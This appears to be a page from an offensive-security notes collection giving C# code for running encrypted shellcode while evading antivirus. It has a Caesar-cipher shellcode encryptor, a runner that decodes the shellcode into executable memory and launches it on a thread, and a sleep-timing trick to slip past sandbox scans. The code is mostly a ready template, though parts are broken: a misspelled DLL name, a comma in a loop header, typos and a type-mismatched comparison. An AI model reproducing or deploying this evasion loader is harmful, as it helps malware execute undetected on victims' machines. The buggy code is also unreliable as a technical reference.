C# Runner

Using Caesar Cipher:

Bypass Signature detection using encrypted shellcode and custom C# runner.

using System;
using System.Collections.Generic;
using System.Text;
using System.Linq;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace Runner 
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        
        [DllImport("kernel.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        
            static void Main(string[] args)
            {
                byte[] buff = //new byte[700]{ SHELL CODE }; CHANGE THIS
                for (int i = 0; i < buff.Length; i++)
                {
                    buff[i] = (byte)(((uint)buff[i] - 2) & 0xFF);
                }
                int size = buff.Length;
                IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
                Marshal.Copy(buff, 0, addr, size);
                IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
        }
    
    }

Encryptor

using System;
using System.Collections.Generic;
using System.Text;
using System.Linq;
using System.Threading.Tasks;

namespace CaesarEncrypt
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] buff = // new byte[700]{...SHELL CODE...}
            byte[] encoded = new byte[buff.Length];
            for (int i = 0, i < buff.Length; i++)
            {
                    encoded[i] = (byte)(((uint)buff[i] + 2) & 0xFF);
            }
            
            
            StringBuilder hexCode = new StringBuilder(encoded.Length * 2);
            foreach (byte x in encoded)
            {
                hexCode.AppendFormat("0x{0:x2}, ", x);
            }
            
            Console.WriteLine("Encrypted ShellCode:" + hexCode.ToString());
            
        }
    }
}

Bypass Heuristic Scan with Delay

Sleep function will detected by sandbox, and can pass the delay when inspecting our shell.

...<snip>...

static extern void Sleep(uint dwMillioSeconds);

static void Main(string[] args)
{
    DateTime time1 = DateTime.Now;
    Sleep(3000);
    dobule time2 = DateTIme.Now.Subtract(time1).TotalSeconds;
    if (time1 < 2.5)
    {
        return;
    }
    
    ...<snip>...

PreviousMSBuild ShellNextPayload Mod

Last updated